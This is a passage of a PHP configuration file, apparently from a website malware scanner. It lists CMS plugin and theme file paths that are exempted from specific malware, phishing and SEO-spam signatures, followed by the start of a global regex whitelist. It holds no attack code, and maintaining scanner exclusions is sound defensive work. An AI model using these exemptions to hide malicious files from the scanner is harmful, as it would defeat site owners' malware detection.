'/mlx/mlx_edf.php', '/litextension/cartmigration/model/cart/magento13.php', '/litextension/cartmigration/model/cart.license2.php', '/app/code/mlx/guestwishlist2/', ), 
'php.malware.generic.011' => array('porpress/porpress.php', '/components/com_jsjobs/views/employer/tmpl/', 'components/com_jsjobs/models/jsjobs.php', '/inc/lib/functions.php', ), 
'php.malware.generic.015' => array('wp-content/plugins/premium-floating-social-media-icon/', 'app/code/local/Mirasvit/MCore/Helper/Code.php', ), 
'php.malware.generic.017' => array('/components/com_2j_news_slider/', '/modules/mod_2j_news_slider/mod_2j_news_slider.php', '/system/2j_news_slider.php', '/components/com_chronocontact/chronocontact.html.php', '/includes/src/Mxp_Menuadmin_Block_Abstract.php', '/includes/src/Mxp_Menuadmin_license.php', '/Mxp/Menuadmin/controllers/Adminhtml/MenuadminController.php', '/Mxp/Menuadmin/Block/Abstract.php', '/Mxp/Menuadmin/license.php', '/plugins/system/2j_tabs.php', 'components/com_2j_tabs/2j_tabs.php', '/modules/mod_2j_tabs/mod_2j_tabs.php', '/administrator/components/com_2j_tabs/', 'plugins/system/jchat.php', 'administrator/components/com_jchat/admin.jchat.php', 'components/com_jchat/jchat.php', '/plugins/system/ykhooncontentprotectoradvanced/ykhooncontentprotectoradvancedhelper.php', ), 
'php.malware.generic.019' => array('app/code/local/MageWorkshop/DetailedReview/Helper/Data.php', 'app/code/local/MageWorkshop/DetailedReview/Model/Observer.php', 'FGXseal.php', '/mjguest/mjguest.class.php', '/app/code/community/All4coding/Core/', 'wp-content/plugins/bulletproof-security/admin/tools/b64-offline-decoder.php', '/includes/src/all4coding_core_', '/includes/src/all4coding/core/', ), 
'php.malware.generic.020' => array('WebForms/Block/Webforms.php', '/includes/src/VladimirPopov_old_WebForms_Block_Webforms.php', ), 
'php.malware.generic.027' => array('/components/simplecart/model/simplecart/simplecart.class.php', ), 
'php.malware.generic.027.006' => array('/application/modules/Sitemobile/controllers/license/', ), 
'php.malware.generic.027.009' => array('Cw/Key.php', '/Customweb_Licensing_SagePayCw_Key.php', ), 
'php.malware.generic.028' => array('/app/code/community/Devinc/License', '/Devinc_License_', '/IndexController.php', '/includes/src/nett_prescription_block_nhsconfirm.php', '/includes/src/nett_prescription_helper_surgery.php', '/includes/src/ings/onlinerequest/controllers/requestlistcontroller.php', '/includes/src/ings/onlinerequest/controllers/disapprovedlistcontroller.php', '/myadmin/functions/decrypt', '/_models/pages/login.php', '/app/code/community/magextension/sdocp/model/observer.php', ), 
'php.malware.generic.036' => array('qa-include/qa-theme-base.php', 'smgautobrokers/template-parts/portfolio-format/portfolio-image.php', 'wp-content/themes/getamericamoving/functions.php', 'mopar/amecache/ameinfo.php', 'plugins/cpo-shortcodes/shortcodes/shortcode-optin.php', '/components/com_guru/views/guruorders/tmpl/printcertificate.php', 'wp-content/plugins/goodbye-captcha/engine/admin/pages/GdbcBaseAdminPage.php', '/wp-content/themes/garden/portfolio.php', '/wp-content/themes/garden/vc_templates/section_portfolio.php', '/wp-content/themes/garden/taxonomy-portfolio_category.php', '/wp-content/themes/SportsGeek2/header.php', '/wp-content/themes/SportsGeek2/070312.header.php', 'wp-content/themes/rosetta/portfolio.php', 'wp-content/themes/rosetta/taxonomy-portfolio_category.php', '/wp-content/themes/rosetta/vc_templates/section_portfolio.php', '/wp-content/themes/rosetta-child/vc_templates/section_portfolio.php', 'czteryporyroku/css/product.php', '/wp-content/themes/bretheon/footer.php', '/wp-content/plugins/forge-advanced-elements/elements/element-', 'system/application/modules/article/views/articleDetails.php', 'system/application/modules/article/views/gallery.php', ), 
'php.malware.generic.037.02' => array('plugins/fancy-gallery-pro/updates.php', ), 
'php.malware.generic.061' => array('/webanalyze/setup.php', ), 
'php.malware.gzinflate_hex.001' => array('/mailhive/common/functions/template_engine.php', 'mailhive/filterbeez/filter_do_throttling_simple/magic_5.php', '/devinc/license', '/adult/IndexController.php', 'billing/includes/api/getticketnote.php', '/devinc_license_', '/includes/src/nett_prescription_block_nhsconfirm.php', '/includes/src/nett_prescription_helper_surgery.php', '/includes/src/ings/onlinerequest/controllers/requestlistcontroller.php', '/includes/src/ings/onlinerequest/controllers/disapprovedlistcontroller.php', '/myadmin/functions/decrypt', '/_models/pages/login.php', '/getticketnote.php', '/app/code/community/magextension/sdocp/model/observer.php', ), 
'php.malware.http-enc.001' => array('/ckfinder/ckfinder.js', '/ckfinder.js', ), 
'php.malware.include.003' => array('model/storeonline/admin/admin_cms_page_layout.php', ), 
'php.malware.include.004' => array('/model/storeonline/includes/va_functions.php', ), 
'php.malware.include.006' => array('/wp-content/wishlist-member-backup/wpm.php', '/plugins/wishlist-member/wpm.php', ), 
'php.malware.include.047' => array('/wp-content/plugins/social-funnel-machine/js/wpvp_', '/phpchat-free/canned_commands.php', ), 
'php.malware.include.052' => array('/wp-content/plugins/wordfence/lib/wfcrawl.php', ), 
'php.malware.include.054' => array('/plugins/gotmls/images/index.php', '/wp-content/plugins/scanner/assets/index.php', '/modules/home/dashlets.php', ), 
'php.malware.include.060' => array('/catalog/checkout_success.php', ), 
'php.malware.injector.005' => array('/plugins/system/jat3/jat3/core/ajax.php', '/aulavirtual/lib/typo3/class.t3lib_div.php', 'plugins/wp-stats-dashboard/classes/util/metrics/WPSDMozRank.php', 'plugins/content/jw_allvideos/jw_allvideos/includes/js/mediaplayer/jwplayer.min.js', '/plugins/system/t3/includes/gfont/T3GFont.php', '/wp-content/plugins/ts-visual-composer-extend/assets/ts_vcsc_registrations_functions.php', '/jat3/core/ajax.php', '/wp-content/plugins/widgetkit/plugins/content/instagram/src/InstagramApp.php', 'wp-content/plugins/widgetkit/plugins/content/rss/src/RSSApp.php', '/admin/functions.php', '/extra/projectplan/external/html2pdf/_class/parsingcss.class.php', '/admin/html2/html2pdf/_class/parsingcss.class.php', '/sysext/core/classes/utility/generalutility.php', ), 
'php.malware.injector.009' => array('LiveZilla/image.php', 'livezilla/image.php', 'Livezilla/image.php', '/livehelp/image.php', '/livezilla/img.php', '/LiveZilla/img.php', '/LIVEZILLA/image.php', '/livezilla/script.php', ), 
'php.malware.injector.010' => array('/.wysiwygPro_preview_', ), 
'php.malware.injector.016' => array('modules/mod_goodrelations/helper.php', 'includes/src/Semantium_MSemanticBasic_Model_', '/app/code/community/Semantium/MSemanticBasic/sql/msemanticbasic_setup/mysql4-', '/app/code/community/Semantium/MSemanticBasic/Model/Resource/Eav/Mysql4/Setup.php', '/app/code/community/Semantium/MSemanticBasic/Model/Observer.php', 'app/code/community/Evo/core/copyandpay.php', 'includes/src/Hyperpay_core_copyandpay.php', 'app/code/community/Hyperpay/core/copyandpay.php', '/modules/mod_goodrelations/controller.php', '/additional-providers/hybridauth-qq/Providers/QQ.php', ), 
'php.malware.injector.028' => array('/classes/view_gettingstarted_content.php', '/classes/view_gettingstarted.php', '/classes/view_msgettingstarted.php', '/permalink-finder/includes/pf-options.php', 'components/com_avreloaded/views/about/tmpl/default.php', '/plugins/wp-ajax-edit-comments/views/admin-getting-started.php', '/wp-content/plugins/wp-ajax-edit-comments/views/.svn/', 'wp-content/plugins/backupbuddy/backupbuddy.php', 'tgz/backup/install/index.php', '/personalizedskaters/install/index.php', '/setup/index.php', '/install/index.php', '/app/design/adminhtml/default/mcd/template/mcdcatalog/options/artwork.phtml', '/wp-content/plugins/BackupBuddy/backupbuddy.php', 'plugins/backupbuddy_classic/backupbuddy.php', '/wp-content/plugins/wp-cerber/dashboard.php', '/plugins/wp-cerber/trunk/dashboard.php', '/plugins/wp-cerber/dashboard.php', '/wp-content/plugins/woocommerce-printorders/print-orders.php', '/wp-content/wp-cerber/dashboard.php', ), 
'php.malware.injector.051' => array('/core/application.php', ), 
'php.malware.injector.055' => array('/extension/readygraph/', '/wp-content/plugins/seedprod-coming-soon-pro-5/admin/admin.php', '/templates/content-authors.php', '/course/single/home.php', ), 
'php.malware.injector_gen.025' => array('/wp-content/plugins/mac-dock-gallery/macImportAlbums.php', '/wp-content/plugins/zopim-live-chat/zopim.php', '/sohoadmin/program/includes/remote_actions/class-file_download.php', 'app/code/local/zopim/livechat/block/customization.php', 'sites/all/modules/filefield_sources/sources/remote.inc', '/components/com_atomicongallery/helpers/atomicon.php', 'wp-content/plugins/bonobo/weather.php', ), 
'php.malware.injector_gen.027' => array('/vertex/admin/vertexFramework.php', 'vertex/admin/vertexframework.php', ), 
'php.malware.obfuscated.001' => array('/wp-content/plugins/botdetect-wp-captcha/lib/botdetect/CaptchaIncludes.php', '/system/library/mfilter_core.php', '/system/library/mfilter_module.php', '/wp-content/plugins/miniorange-login-openid/', ), 
'php.malware.obfuscated.001.02' => array('/Wyomind/Datafeedmanager/Model/Configurations.php', ), 
'php.malware.obfuscated.001.03' => array('css/ntpagetag.js', ), 
'php.malware.obfuscated.002' => array('/modules/mod_foxcontact/mod_foxcontact.inc', '/components/com_foxcontact/foxcontact.inc', '/wp-content/plugins/popup-domination/popup-domination.admin.php', 'plugins/popup-domination/popup-domination.php', 'application/modules/Siteluminous/controllers/license/license.php', 'application/modules/Seaocore/controllers/license/request.php', 'application/modules/OldSiteluminous/controllers/license/license2.php', 'application/modules/Communityad/controllers/license/license.php', 'application/modules/Communityad/controllers/license/license1.php', 'application/modules/Communityad/controllers/license/license2.php', 'application/modules/Advancedactivity/controllers/license/license.php', 'application/modules/Advancedactivity/controllers/license/license1.php', 'application/modules/Advancedactivity/controllers/license/license2.php', '/application/modules/Site', '/application/modules/Communityad/controllers/license/', '/application/modules/Advancedactivity/controllers/license/', '/application/modules/Sitemobile/controllers/license/', '/application/modules/Sitealbum/controllers/license/', '/application/modules/Sitereview/controllers/license/', '/application/modules/Seaocore/controllers/license/', '/wp-content/plugins/wp-filebase-pro/', '/app/code/community/Nostress/Nscexport/', 'includes/src/Nostress_Nscexport_Model_', 'social-link-machine/v2/platforms/SLMOverBlogHelper.php', 'social-link-machine/utils/facebook/base_facebook.php', '/modules/List/controllers/license/license.php', '/modules/List/controllers/license/license1.php', '/modules/List/controllers/license/license2.php', '/modules/List/controllers/license/license3.php', '/modules/Socialengineaddon/controllers/license/license1.php', '/modules/YounetCore/Bootstrap.php', 'wp-content/plugins/social-link-machine/', 'plugins/popup-domination/popup-domination.admin.php', 'wp-content/plugins/captcha-on-login/templates/options.php', 'wp-content/plugins/captcha-on-login/templates/report.php', 'wp-content/plugins/captcha-on-login/index.php', '/modules/mod_jbgmusic/includes/support_license.php', '/wp-content/themes/myrestaurant/core/theme.php', 'endy/includes/functions.php', '/sendy/install.php', '/mailer/_install.php', 'mailer/includes/functions.php', '/app/code/community/AwoDev/AwoRewards/Model/License.php', '/app/code/community/Medma/Registrationremove/Model/Authenticate.php', '/app/code/local/medma/assigncategory/model/authenticate.php', '/yoast-wordpress-seo-premium/admin/license-manager/class-license-manager.php', 'foxcontact.inc', '/seo-xray-hero-limited/views/admin.php', '/seo-xray-hero-limited/views/lc.php', '/includes/src/emvee_folio_block_adminhtml_abstract.php', '/modules/mod_snowfall/mod_snowfall.php', '/modules/mod_snowfall/include_ver.php', '/app/code/community/medma/copyoptions/model/authenticate.php', '/sanalpospro/controllers/', '/sanalpospro/lib/', '/wp-content/plugins/social-funnel-machine/wpvp-', '/wp-content/plugins/social-funnel-machine/js/wpvp_', '/wp-content/plugins/social-funnel-machine/wp-', '/wp-content/plugins/social-funnel-machine/config.php', '/phpchat-free/', '/wp-content/plugins/dragonpay-for-woocommerce/index.php', '/wp-content/plugins/dragonpay-for-woocommerce/synchronization.php', '/wp-content/plugins/dragonpay-for-woocommerce/class2.php', '/wp-content/plugins/dragonpay-for-woocommerce/lib/', '/app/code/local/emvee/folio/block/', '/tigermin/controller/configcontroller.php', '/tigermin/controller/indexcontroller.php', '/wp-content/themes/newspapertimes-multi-pro/functions.php', '/wp-content/plugins/dsgvo-de/bc-dsgvo-de.php', '/mall/m/func_lib.php', '/mall/func_lib.php', ), 
'php.malware.obfuscated.002.02' => array('/app/code/community/AwoDev/AwoRewards/Model/License.php', ), 
'php.malware.obfuscated.003.02' => array('/app/code/local/Itoris/', '/includes/src/Itoris', '/app/code/community/All4coding/NewProducts/', '/app/code/community/All4coding/Core/', '/administrator/components/com_sfg/', '/components/com_sfg/', '/plugins/content/', '/wp-content/plugins/phpbay/ebay.php', '/app/code/community/all4coding/adsense/helper/data.php', '/app/code/community/all4coding/adsense/block/ad.php', '/wyomind', '/wp-content/themes/rothkotheme/js/google_js/oms.min.js', '/tutorial-esl-ebooks.html', '/js/google_js/oms.min.js', '/wp-content/plugins/miniorange-login-openid/', '/vendor/cart2quote/module-license/files/alterations.php', '/wp-content/plugins/miniorange-otp-verification-onprem/', ), 
'php.malware.obfuscated.004' => array('wp-content/plugins/simple-subscribe/libs/Nette/Nette.min.php', 'components/com_plotalot/models/chart.php', 'framework/vendor/nette-closures.min.inc', 'framework/vendor/nette.min.inc', '/app/code/community/Nostress/Nscexport/', 'modules/mod_foxcontact/mod_foxcontact.inc', 'social-link-machine/utils/facebook/base_facebook.php', '/wp-content/plugins/social-link-machine/', '/wp-content/plugins/wp-filebase-pro/', '/components/com_foxcontact/foxcontact.inc', ), 
'php.malware.obfuscated.022' => array('/mailer/_install.php', 'wp-content/plugins/paypal-wp-button-manager/admin/js/paypal-wp-button-manager-paypal.js', '/ckeditor/plugins/wsc/dialogs/wsc.js', 'forum/applications/core/interface/ckeditor/ckeditor/plugins/ipscode/plugin.js', '/sysext/rte_ckeditor/resources/public/javascript/contrib/plugins/wsc/dialogs/wsc.js', '/wp-content/plugins/blog2social/assets/lib/moment/moment-with-locales.min.js', '/assets/js/dynamic/moment-with-locales.min.js', '/moment-with-locales.min.js', '/lidergb/lider/main.', '/wp-content/plugins/use-your-drive/includes/chartjs/chart.bundle.min.js', '/js/emag.3.0.min.js', '/wp-content/plugins/easy-appointments/js/libs/moment.min.js', '/moment/min/locales.min.js', '/wsc/dialogs/wsc.js', '/pressforward/libraries/mozillareadability/test/', '/lumino.glyphs.js', '/plugins/ipscode/plugin.js', '/wp-content/plugins/video-conferencing-with-zoom-api/assets/vendor/moment/locales.min.js', '/control/assets/new/ckfinder/ckfinder.js', '/wp-content/plugins/updraftcentral/js/momentjs/locales.min.js', ), 
'php.malware.pack.004' => array('/app/code/community/tbt/common/', '/app/code/community/tbt/rewards', '/includes/src/sweettooth', '/lib/sweettooth/classes/', '/includes/src/tbt', ), 
'php.malware.pack.005' => array('/app/code/local/mlx/', ), 
'php.malware.preg_replace_hexcode.001' => array('/Simplegoogleshopping/Model/Simplegoogleshopping.php', '/wp-content/plugins/quttera-web-malware-scanner/qtrmimetype.php', '/includes/src/Wyomind_Datafeedmanager_Model_Configurations.php', '/wp-content/plugins/instagrate-to-wordpress/php/emoji.php', '/plugins/system/joomlaidplogin/saml2idp/assertion.php', '/wp-content/plugins/twitter-tracker/emoji/emoji.php', ), 
'php.malware.require_image.001' => array('/prismereact/src/', '/kitchen-sink/kitchen-sink-uncompressed.js', '/raphael', '/svg_attach.js', '/resources/dist/js/bootstrap.js.map', '/admin/node_modules/quill/dist/quill.min.js.map', '/quill.min.js.map', ), 
'php.malware.require_plugin.001' => array('/wp-content/plugins/wp-symposium/tutorials/mail_page_template/wps_', ), 
'php.malware.sequentialencoding.001' => array('/wp-content/plugins/zoho-crm-forms/includes/', '/lib/internal/customweb/licensing/oppcw/key.php', ), 
'php.malware.small_file.001' => array('/Expression.php', '/wp-content/plugins/mainwp-child/class/class-mainwp-tools.php', '/application/libraries/Scaffold/extensions/functions/phase_02/calc.php', '/dap/', '/dapeasyinstaller/siteroot.php', './wp-content/plugins/infinite-scroll/templates/footer.php', '/flippingbook.php', '/Devinc.php', '/controller.php', '/citypage.php', '/complete.php', '/css.php', '/fail.php', '/logout.php', '/mapsearch.php', '/sr-mapsearch.php', '/success.php', '/jump-inc-setbodymonetizationmid.php', '/jump-inc-setfootermonetization.php', '/jump-inc-setmonetization.php', '/jump-inc-setmonetizationmid.php', '/Native.php', '/q2w3_get.php', '/Reader.php', '/Paiement.class.php', '/cfaction_custom_code.php', '/cfaction_load_css.php', 'rewardssocial/facebook/body_end/event_register.phtml', 'template/rewardssocial/facebook/share/button.phtml', 'rewardssocial/facebook/body_end/event_register_share.phtml', 'rewardssocial/twitter/tweet/body_end/event_register.phtml', 'wp-content/themes/atahualpa/functions/bfa_center_content.php', 'wp-content/plugins/MTOS-4.25-en/php/lib/modifier.mteval.php', 'PHPParser/Node/Expr/Eval.php', '/xcache/htdocs/cacher/config.default.php', '/xcache/htdocs/cacher/config.example.php', '/wp-content/plugins/infinite-scroll/templates/footer.php', '/comments.php', '/api.php', '/WishListAcl.php', '/Functions.php', '/integration.shoppingcart.eway.tooltips.php', '/integration.autoresponder.tooltips.php', '/settings.registration.tooltips.php', '/integration.shoppingcart.infusionsoft.tooltips.php', '/membershiplevels.content.posts.tooltips.php', '/integration.shoppingcart.authorize.tooltips.php', '/sequential.tooltips.php', '/integration.shoppingcart.clickbank.tooltips.php', '/membershiplevels.content.cats.tooltips.php', '/settings.wizard.tooltips.php', '/integration.shoppingcart.quickpaypro.tooltips.php', '/integration.shoppingcart.1shoppingcart.tooltips.php', '/integration.shoppingcart.paypal.tooltips.php', '/members.blacklist.tooltips.php', '/membershiplevels.tooltips.php', '/membershiplevels.content.files.tooltips.php', '/dashboard.tooltips.php', '/integration.autoresponder.generic.tooltips.php', '/settings.cron.tooltips.php', '/membershiplevels.content.tooltips.php', '/settings.registration.css.tooltips.php', '/settings.registration.recaptcha.tooltips.php', '/membershiplevels.content.folders.tooltips.php', '/membershiplevels.movemembership.tooltips.php', '/members.import.tooltips.php', '/settings.advanced.tooltips.php', '/integration.autoresponder.getresponse.tooltips.php', '/integration.shoppingcart.ultracart.tooltips.php', '/integration.shoppingcart.generic.tooltips.php', '/shoppingcart.tooltips.php', '/settings.registration.redbox.tooltips.php', '/integration.autoresponder.getresponseapi.tooltips.php', '/settings.backup.tooltips.php', '/extensions.tooltips.php', '/settings.tooltips.php', '/integration.autoresponder.mailchimp.tooltips.php', '/integration.shoppingcart.pwc.tooltips.php', '/members.broadcast.tooltips.php', '/integration.shoppingcart.2co.tooltips.php', '/integration.autoresponder.aweber.tooltips.php', '/members.tooltips.php', '/membershiplevels.payperpost.tooltips.php', '/integration.autoresponder.sendstudio.tooltips.php', '/integration.autoresponder.arp.tooltips.php', '/integration.autoresponder.icontact.tooltips.php', '/integration.shoppingcart.redoakcart.tooltips.php', '/integration.tooltips.php', '/members.export.tooltips.php', '/integration.autoresponder.infusionsoft.tooltips.php', '/integration.webinar.gotomeeting.php', '/settings.registration.css.php', '/integration.webinar.php', '/settings.default.cron.php', '/settings.cron.php', '/integration.autoresponder.arp.php', '/integration.webinar.gotomeeting.php', '/integration.autoresponder.generic.php', '/integration.autoresponder.aweber.php', '/integration.autoresponder.getresponse.php', '/after_registration_internal.php', '/after_login_internal.php', '/wrong_level_error_page_internal.php', '/membership_cancelled_internal.php', '/non_members_error_page_internal.php', '/ZeroClipboard.wlm.js.php', '/Product_Tabs/admin/admin_part3.inc.php', '/Product_Tabs/mod_part4.inc.php', '/Product_Tabs/mod_part5.inc.php', '/sohoadmin/program/modules/site_templates/remote_template_browsing/', 'wp-content/plugins/wp-client/includes/payment_gateways/stripe-files/lib/Stripe/', 'wp-content/plugins/wp-client/includes/libs/', '/imagemap/js/canvas.js', 'body_end/event_register_', '/components/com_helpdeskpro/assets/syntaxhighlighter3/scripts/shAutoloader.js', 'upload/install/controller/startup/database.php', '/plugins/system/cp/cp.php', '/app/code/local/Spletnisistemi/Fastimporter/controllers/IndexController.php', '/js/includes/src/Magebird', '/media/unint.php', '/forums/dbtech/usertag/hooks/mod_index_navigation.php', '/wp-content/plugins/stats-counter/methods/class-wpadm-method-exec.php', '/shopping/pgm-show_invoice.php', '/shopping/prod_paypalpro_card.php', '/lang/', ), 
'php.malware.str_rot13_url.001' => array('SuperChartBoy/php/inc/scb-from-the-blog.php', '/wp-content/themes/BlackPower/functions.php', 'administrator/components/com_jmap/models/ajaxserver.php', '/mla-full-web_', ), 
'php.malware.strrev.002.02' => array('/wp-content/plugins/file-away/lib/cls/class.fileaway_', '/wp-content/plugins/dynamo-support/includes/dynamoupdates.class.php', '/wp-content/plugins/dynamo-support/dynamo-support.php', 'wp-content/plugins/click-heat-dynamo/tpl/dynamoupdates.class.php', 'wp-content/plugins/split-test-dynamo/tpl/dynamoupdates.class.php', 'wp-content/plugins/split-test-dynamo/wp_split_test_main.class.php', 'custom-sidebars/customsidebars.php', 'wp-content/plugins/click-heat-dynamo/wp_adv_click_map_main.class.php', 'Cw/Key.php', '/Customweb_Licensing_SagePayCw_Key.php', '/file-away/lib/cls/class.fileaway_stats.php', 'wp-content/plugins/amazon-dynamo/includes/updates/dynamoupdates.class.php', 'wp-content/plugins/buzz-burner/buzz-burner.php', 'wp-content/plugins/content-buddy/wp_content_buddy_main.class.php.orig', '/wp-content/plugins/bulletproof-security/admin/tools/tools.php', 'controller/module/microdatapro.php', 'system/library/microdatapro.php', '/administrator/components/com_vbupdater/site18/helpers/lib.vikbooking.php', 'wp-content/plugins/bulletproof-security/admin/tools/b64-offline-decoder.php', '/cmsb/lib/login_functions.php', 'customweb_licensing_worldpaycw_key.php', ), 
'php.phishing.generic.070' => array('/2i_using_focus_mobile/pay.htm', '/pay.php', ), 
'php.phishing.generic.075' => array('/foto/errors.php', '/includes/db_connect.php', '/includes/error.php', ), 
'php.phishing.generic.078' => array('/workfromcloud_new/signinnew.php', ), 
'php.phishing.generic.082' => array('/includes/functions/wd_functions.php', ), 
'php.phishing.mailer.048' => array('/wp-content/plugins/profit_builder/profit_builder_class.php', ), 
'php.phishing.mailer.096' => array('/framework/class/class_white_label_themes.php', '/config/init_functions.php', '/wp-content/themes/da/framework/class/class_core.php', ), 
'php.phishing.mailer.111' => array('/wp-content/plugins/wpsecure/secure-login.php', '/wp-content/plugins/smartpaycart/includes/frontend/lib/functions_fe.php', ), 
'php.phishing.mailer.134' => array('/phperrordoc/phperrordoc.php', '/inc/functions.php', ), 
'php.phishing.netflix.002' => array('/wp-content/cache/', ), 
'php.phishing.script.002' => array('/wp-content/plugins/anti-spam/anti-spam.php', '/anticipate-maintenance-plugin.php', ), 
'php.phishing.script.023' => array('/wp-content/plugins/hide-my-wordpress/classes/tools.php', '/wp-content/plugins/project-supremacy-v3/models/wp_projects.php', '/api-url.php', ), 
'php.phishing.visa.001.03' => array('/vsadmin/inc/inccart.php', ), 
'php.redirect.header_location.001' => array('/devinc/license', '/adult/indexcontroller.php', '/devinc_license_', '/includes/src/nett_prescription_block_nhsconfirm.php', '/includes/src/nett_prescription_helper_surgery.php', '/includes/src/ings/onlinerequest/controllers/requestlistcontroller.php', '/includes/src/ings/onlinerequest/controllers/disapprovedlistcontroller.php', '/myadmin/functions/decrypt', '/_models/pages/login.php', '/app/code/community/magextension/sdocp/model/observer.php', ), 
'php.redirect.header_location.006' => array('/wp-content/plugins/wp-filebase-pro/classes/sync.php', ), 
'php.redirect.header_location.022' => array('wp-content/themes/js/wp-content/plugins/wp-traffic-tools/drop_insurance.php', 'webformmailer.php', 'themes/becomar/ajax/brochure-request-info.php', 'gdform.php', 'lib/adm/inc/phpFlickr/_bin/phpFlickr.php', '/phpFlickr/phpFlickr.php', '/resources/paydb_inquire.php', 'afgFlickr/afgFlickr.php', '/wp-content/plugins/wordpress-mobile-pack/themes/premium/page.php', '/wp-content/plugins/wordpress-mobile-pack/themes/premium/template.php', '/wp-content/plugins/wordpress-mobile-pack/themes/premium/category.php', '/wp-content/plugins/wordpress-mobile-pack/themes/premium/single.php', 'wp-content/plugins/mailchimp-for-wp/includes/class-admin.php', 'modules/simpletest/tests/system_test.module', '/wp-content/plugins/nex-forms-express-wp-form-builder/includes/Core/class.db.php', 'chat/track.php', 'chat/server.php', '/plugins/TrafficAnalysis/trafficTrack.php', 'plugins/wp-301redirect/wp-301redirect.php', 'components/com_formdataportal/helpers/FormDataPortalHelper.php', '/wp-content/plugins/slickr-flickr/phpFlickr.php', '/wp-content/plugins/awesome-flickr-gallery-plugin/afgFlickr/.afgFlickr.php.swp', '/modules/User/controllers/ProfileController.php', 'wp-content/plugins/social-link-machine/index.php', 'wp-content/plugins/social-link-machine/v2/platforms/pdf/tcpdf_min/index.php', '/wp-content/themes/publisher/404.php', '/vsadmin/delete-image.php', '/sohoadmin/client_files/', '/wp-content/plugins/slickr-flickr/classes/class-phpFlickr.php', '/plugins/content/enbed_pdf/proxy.php', 'forms/reservation/admin/lib/menus/default/common.php', 'plugins/nextendslidergenerator/flickr/api/phpFlickr.php', '/wp-content/plugins/easy-social-share-buttons3/lib/modules/social-fans-counter/flickr/phpFlickr.php', '/mock-tinypng-webservice/shrink.php', 'hidemyass.php', '/plugins/pw-vc-accordion-slider/class/phpflickr-3.1/phpflickr.php', '/lib/phpflickr.php', ), 
'php.redirect.header_location.023' => array('/TeachersStudentCharity', ), 
'php.spam-seo.black_hat_client.001' => array('/wp-content/themes/educationpack/header.php', ), 
'php.spam-seo.doorway-gen.103' => array('/wp-content/plugins/bdthemes-element-pack/base/element-pack-base.php', '/candidate/includes/candidatebase.php', '/cryptox/admin/cryptoxbase.php', ), 
'php.spam-seo.fake_docs_plugin.001' => array('modules/backend/formwidgets/codeeditor/assets/js/build-min.js', '/formwidgets/codeeditor/assets/js/build-min.js', '/wp-content/plugins/trafficplugin_pro/pinterest/inc/nxs-functions.php', ), 
'php.spam-seo.fake_plugin.018' => array('/wp-content/plugins/ontrapages/ontrapages.php', ), 
'php.spam-seo.generic.007' => array('components/com_easyblog/includes/oauth/adapters/twitter/client.php', 'components/com_easyblog/includes/oauth/adapters/linkedin/client.php', ), 
'php.spam-seo.generic.033' => array('/adminhtml/magento/backend/en_us/js/bundle/bundle', ), 
'php.spam-seo.header_location.025' => array('/directoryadmin/manage_', ), 
'php.spam-seo.header_location.027' => array('/wp-content/plugins/paypal-express-checkout/classes/paypalapi.php', ), 
'php.spam-seo.header_location.032' => array('/wp-content/plugins/default_library_puvox.php', ), 
'php.spam-seo.hidden-style.001' => array('wp-content/themes/maya/core/sendemail.php', 'wp-content/themes/maya2/maya/core/sendemail.php', '/wp-content/plugins/easy_installer/demo_data_here/redux_options_', '-content/temp/twig/', ), 
'php.spam-seo.injector.028' => array('wyomind/ordersexporttool/Helper/OrdersExportTool.php', ), 
'php.spam-seo.injector.101' => array('/wp-content/themes/default/index.php', ), 
'php.spam-seo.injector.128' => array('transposh-translation-filter-for-wordpress/transposh.php', 'content/admin/admin_product_emails.php', '/wpguaven/functions.php', '/wp-content/plugins/membermouse/lib/litle/Communication.php', '/sites/all/modules/nln_faboverfifty/stripecoupontesting.php', 'nln_faboverfifty/stripecoupontesting/stripecoupon_form_coupon.php', 'wp-content/plugins/hana-flv-player/plugin_feed.php', 'duda.api.php', 'wp-content/plugins/wp-live-chat-support/wp-live-chat-support.php', 'wp-content/plugins/cbcurrencyconverter/cbcurrencyconverter.php', '/popup-domination/subscription.php', '/components/com_streamsend/controller.php', ), 
'php.spam-seo.injector.147' => array('application/modules/Seaocore/controllers/license/license1.php', ), 
'php.spam-seo.injector_gen.007' => array('wp-content/plugins/server-security-scan/check.php', 'gauntlet-security/admin/includes/classes/gus_FilePermissions.php', '/rollcall/admin/sysedit.php', '/admin/sysedit.php', ), 
'php.spam-seo.injector_gen.018' => array('access.fs/class.fsAccessDriver.php', ), 
'php.spam-seo.injector_gen.039' => array('/plugins/helpdeskplugin-1.0/hesk/heskplugin.php', ), 
'php.spam-seo.injector_gen.040' => array('/plugins/wordpress-ez-backup/pages/main.php', ), 
'php.spam-seo.link_injector.010' => array('/wp-content/plugins/dzs-zoomsounds/class-dzsap.php', ), 
'php.spam-seo.redirect.057' => array('/mint/app/lib/mint.php', '/customize-widget.php', ), 
'php.spam-seo.redirect.098' => array('/app/http/controllers/callbackcontroller.php', '/settings.php', ), 
'php.spam-seo.require_wp_content.001.02' => array('/wp-content/themes/inovado/functions.php', ), 
'php.spam-seo.theme_link_spam.001' => array('/wp-content/themes/BlackPower/functions.php', '/wp-content/themes/casandresmagazine/functions.php', ), 
'php.spam-seo.theme_link_spam.002' => array('/wp-content/themes/BlackPower/functions.php', '/wp-content/themes/casandresmagazine/functions.php', ), 
);
$REGEX_WHITELIST_SIG = array(
'all_sigs' => array('administrator/components/com_config/controllers/application.php', 'app/includes/src/SweetTooth_classes_Loyalty.php', 'app/includes/src/TBT_', 'app/includes/src/TBT/Common/controllers/Front/AbstractController.php', 'app/includes/src/SweetTooth/classes/Loyalty.php', 'app/includes/src/TBT-old/RewardsLoyalty/controllers/PlatformController.php', 'app/includes/src/TBT-old/Common/controllers/Admin/AbstractController.php', 'app/includes/src/TBT-old/Common/controllers/Front/AbstractController.php', 'app/lib/SweetTooth/classes/Loyalty.php', 'app/includes/src/SweetTooth/classes/Loyalty.php', 'app/lib/SweetTooth/classes/Loyalty.php', 'app/code/local/Magestore/Magenotification/Data.php', 'app/code/local/Magestore/Magenotification/Feedback.php', 'app/code/local/Magestore/Magenotification/Keygen.php', 'app/code/local/Magestore/Magenotification/License.php', 'newsletter/includes/module.php', 'wordpress-ping-optimizer/cbnet-ping-optimizer.php', '/uniforce/data/signatures.php', ), 
